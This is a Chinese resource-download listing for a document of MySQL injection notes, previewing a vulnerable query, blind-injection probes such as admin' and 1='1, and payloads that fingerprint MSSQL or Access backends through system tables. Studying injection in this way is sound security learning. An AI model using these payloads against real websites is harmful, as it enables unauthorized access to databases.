登录 注册
当前位置:主页 > 资源下载 > 16 > MySQL注入记录

MySQL注入记录

  • 更新:2024-10-02 14:04:14
  • 大小:157KB
  • 推荐:★★★★★
  • 来源:网友上传分享
  • 类别:网络攻防 - 安全技术
  • 格式:DOCX

资源介绍

MYSQL注入 select * from user_t where usr = '$username' 盲注 判断是否有注入 admin‘ and 1=’1 返回正常 admin’ and 1=’2 返回错误 表明存在注入 判断数据库系统 and (select count(*) from sysobjects)>0 mssql,在web环境下可以正常读取 and (select count(*) from msysobjects)>0 access,access在系统表【msysobiects】中,但在web中会显示没有权限